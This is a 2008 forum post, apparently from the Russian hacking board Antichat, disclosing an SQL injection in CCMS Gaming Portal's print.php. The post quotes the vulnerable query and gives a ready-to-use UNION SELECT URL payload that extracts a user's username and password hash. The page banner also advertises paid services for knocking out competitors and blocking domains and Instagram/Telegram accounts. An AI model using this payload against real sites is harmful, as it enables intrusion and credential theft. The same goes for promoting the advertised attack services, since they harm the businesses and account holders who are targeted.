CCMS Gaming Portal <= 3.2 SQL Injection Vulnerability

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
CCMS Gaming Portal <= 3.2 SQL Injection Vulnerability

Опции темы

Поиск в этой теме

Опции просмотра

CCMS Gaming Portal <= 4.0 SQL Injection Vulnerability

21.08.2008, 07:29

~~~!DoK_tOR!~~~

Banned

Регистрация: 10.11.2006

Сообщений: 829

Провел на форуме:
2634544

Репутация: 1559

CCMS Gaming Portal <= 4.0 SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 21.08.08
Product: CCMS Gaming Portal
Version: 4.0
The price: $55
URL: customcms.net
Vulnerability Class: SQL injection
Condition: magic_quotes_gpc = Off

print.php

Vuln code:

PHP код:


		
			
  $q = mysql_query("SELECT * from ccms_news_comments WHERE w_id='$id'");

http://localhost/[installdir]/

Exploit:

Код:

print.php?id='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+ccms_user+where+userid=1/*

http://milw0rm.com/exploits/6284

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось ~!DoK_tOR!~; 26.08.2008 в 23:15..

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход